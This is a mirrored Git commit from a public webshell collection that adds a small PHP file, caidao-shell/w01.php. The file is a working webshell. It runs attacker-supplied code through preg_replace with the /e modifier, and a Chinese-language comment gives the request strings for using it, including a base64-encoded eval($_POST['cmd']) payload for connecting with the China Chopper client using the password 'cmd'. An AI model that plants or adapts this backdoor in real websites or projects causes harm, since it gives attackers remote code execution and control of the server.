mirror of
https://github.com/tennc/webshell
synced 2024-11-24 20:23:04 +00:00
parent
c3b98705c4
commit
88ad3b335a
1 changed files with 9 additions and 0 deletions
9
caidao-shell/w01.php
Normal file
9
caidao-shell/w01.php
Normal file
|
@ -0,0 +1,9 @@
|
|||
<?php
|
||||
$a = $_REQUEST['id'];
|
||||
preg_replace('/.*/e',' '.$a,'');
|
||||
?>
|
||||
|
||||
/*
|
||||
执行方法:?id=eval('phpinfo();');
|
||||
菜刀连接方法:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29; 密码cmd
|
||||
*/
|
Loading…
Reference in a new issue